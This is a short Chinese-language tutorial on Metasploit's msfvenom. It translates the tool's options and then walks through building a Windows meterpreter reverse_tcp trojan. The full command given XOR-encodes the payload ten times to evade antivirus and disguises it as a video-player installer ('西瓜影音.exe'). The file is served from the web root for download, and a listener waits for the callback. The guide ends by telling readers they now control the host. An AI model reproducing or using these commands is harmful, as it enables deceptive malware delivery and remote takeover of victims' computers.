一、msfvenom命令
-l, --list 列出[type]的所有模块。 类型是:有效载荷,编码器,点,platforms, archs, encrypt, formats, all
-p, --payload 设置攻击载荷
--list-options 列出--payload <值>的标准,高级和规避选项
-f, --format 指定输出文件格式 可以通过-lformats查看
-e, --encoder 指定编码器,使木马免杀 可以通过-lencoders查看
--service-name 生成服务二进制文件时使用的服务名称
--sec-name 生成大型Windows二进制文件时要使用的新节名称。 默认值:随机的4个字符的字母字符串
--smallest 使用所有可用的编码器生成最小的有效载荷
--encrypt 应用于shellcode的加密或编码类型(使用--list加密以列出)
--encrypt-key 用于--encrypt的密钥
--encrypt-iv encrypt的初始化向量
-a, --arch 指定架构 x86(32位)或x64
--platform 指定平台
-o, --out 文件保存位置
-b, --bad-chars 避免使用的字符示例:'\ x00 \ xff'
-n, --nopsled 在有效负载之前添加一个[length]个大小的点头
--pad-nops 将由-n <length>指定的nopsled大小用作总有效负载大小,自动添加数量为nopsled的nopsled(nops减去有效负载长度)
-s, --space 生成的有效负载的最大大小
--encoder-space 编码的有效负载的最大大小(默认为-s值)
-i, --iterations 指定编码次数
-c, --add-code <path>指定一个额外的win32 shellcode文件以包括
-x, --template 指定要用作模板的自定义可执行文件
-k, --keep 保留--template行为并将有效负载作为新线程注入
-v, --var-name 指定用于某些输出格式的自定义变量名称
-t, --timeout 从STDIN读取有效负载时要等待的秒数(默认为30,禁用为0)
-h, --help 显示要帮助内容
二、msfvenom生成木马
1.生成木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.114.129 LPORT=4444 -b "\x00" -e x64/xor_dynamic -i 10 -f exe -o /var/www/html/西瓜影音.exe
\x:十六进制
00:空字符(ASCII表)
LHOST LPORT:我们的端口和ip,形成交互
这里直接生成到web登陆,方便下载,但要打开Apache
2.下载打开并运行
3.加载攻击模块,设置payload
handler:后门监听程序
payload必须和生成木马指定地址一样
已经连接到主机,接下来就靠你们自己发挥了。